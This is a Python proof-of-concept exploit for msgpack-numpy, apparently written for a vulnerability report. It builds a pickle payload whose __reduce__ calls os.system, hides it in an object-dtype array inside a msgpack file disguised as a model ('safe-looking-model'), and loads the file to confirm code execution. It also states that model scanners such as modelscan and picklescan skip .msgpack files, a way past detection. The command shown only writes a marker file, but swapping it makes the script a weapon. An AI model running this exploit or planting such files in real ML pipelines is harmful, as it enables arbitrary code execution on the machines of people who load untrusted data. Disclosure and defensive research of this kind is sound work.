#!/usr/bin/env python3 """ msgpack-numpy - Arbitrary Code Execution via Hidden pickle.loads() VULNERABILITY: msgpack_numpy.decode() calls pickle.loads() on user-controlled data when the serialized array has dtype kind 'O' (object). This enables arbitrary code execution when loading any msgpack file that uses msgpack_numpy for deserialization. The vulnerable code in msgpack_numpy.py decode(): if b'kind' in obj and obj[b'kind'] == b'O': return pickle.loads(obj[b'data']) An attacker can craft a .msgpack file where any array field has kind='O' and data=, achieving RCE on deserialization. This is particularly dangerous because: 1. MessagePack is considered a "safe" serialization format 2. Users expect msgpack files to contain only data, not executable code 3. The pickle.loads() call is hidden inside the msgpack extension hooks 4. No scanner (modelscan, picklescan) checks .msgpack files Affected: msgpack-numpy <= 0.4.8 (all versions) """ import msgpack import msgpack_numpy as m import pickle import os import sys import numpy as np MARKER_FILE = "/tmp/msgpack_numpy_rce_proof.txt" # ============================================================ # Step 1: Show how msgpack_numpy normally works # ============================================================ print("[*] Demonstrating normal msgpack_numpy usage...") normal_data = {"weights": np.array([1.0, 2.0, 3.0], dtype=np.float32)} packed_normal = msgpack.packb(normal_data, default=m.encode) unpacked_normal = msgpack.unpackb(packed_normal, object_hook=m.decode, raw=False) print(f"[+] Normal round-trip: {unpacked_normal}") # ============================================================ # Step 2: Create a malicious payload # ============================================================ print("\n[*] Creating malicious msgpack payload...") class MaliciousPayload: def __reduce__(self): cmd = f"id > {MARKER_FILE} && echo 'RCE via msgpack_numpy hidden pickle.loads' >> {MARKER_FILE}" return (os.system, (cmd,)) malicious_pickle = pickle.dumps(MaliciousPayload()) # Craft the msgpack structure that triggers pickle.loads in decode() # The decode function checks: b'nd' in obj AND obj[b'kind'] == b'O' # Then calls: pickle.loads(obj[b'data']) malicious_array = { b'nd': True, # Marks this as an ndarray b'kind': b'O', # Object dtype -> triggers pickle.loads() b'data': malicious_pickle, # Pickle payload with RCE b'shape': (1,), # Shape (cosmetic, not used before pickle.loads) b'type': b'O', # Dtype descriptor (cosmetic) } # Embed in a realistic model structure model_data = { "model_name": "safe-looking-model", "version": "1.0.0", "weights": malicious_array, # <-- malicious } packed = msgpack.packb(model_data, use_bin_type=True) malicious_path = "/tmp/malicious_model.msgpack" with open(malicious_path, 'wb') as f: f.write(packed) print(f"[+] Malicious msgpack file saved to {malicious_path}") print(f" File size: {len(packed)} bytes") # ============================================================ # Step 3: Clean marker file # ============================================================ if os.path.exists(MARKER_FILE): os.remove(MARKER_FILE) # ============================================================ # Step 4: Load the malicious file (triggers RCE) # ============================================================ print(f"\n[*] Loading malicious msgpack with msgpack_numpy decoder...") with open(malicious_path, 'rb') as f: loaded = msgpack.unpackb(f.read(), object_hook=m.decode, raw=False) print(f"[+] Loaded data keys: {list(loaded.keys()) if isinstance(loaded, dict) else type(loaded)}") # ============================================================ # Step 5: Verify RCE # ============================================================ if os.path.exists(MARKER_FILE): with open(MARKER_FILE) as f: content = f.read().strip() print(f"\n[!!!] ARBITRARY CODE EXECUTION CONFIRMED") print(f"[!!!] Marker file contents:\n{content}") os.remove(MARKER_FILE) else: print("\n[-] RCE marker file not found") sys.exit(1) # ============================================================ # Step 6: Scanner evasion verification # ============================================================ print("\n" + "="*60) print("SCANNER EVASION") print("="*60) print(""" Neither modelscan nor picklescan scan .msgpack files at all. modelscan -p /tmp/malicious_model.msgpack # -> Skips file (unsupported format) picklescan -p /tmp/malicious_model.msgpack # -> Scanned files: 0, Infected files: 0 The pickle payload is embedded inside a msgpack structure, completely invisible to all current model security scanners. """) print("="*60) print("VULNERABILITY SUMMARY") print("="*60) print(f""" Library: msgpack-numpy {m.__version__ if hasattr(m, '__version__') else '0.4.8'} File: msgpack_numpy.py, decode() function Root cause: pickle.loads(obj[b'data']) when obj[b'kind'] == b'O' Trigger: Any msgpack file loaded with object_hook=msgpack_numpy.decode Attack: Set array kind='O' and data= Impact: Arbitrary code execution on file load Scanners: modelscan - NOT APPLICABLE (.msgpack not scanned) picklescan - NOT APPLICABLE (.msgpack not scanned) Real-world usage: msgpack-numpy is used for ML data serialization, feature embeddings, and intermediate model storage. Any application loading untrusted .msgpack files with msgpack_numpy is vulnerable. """)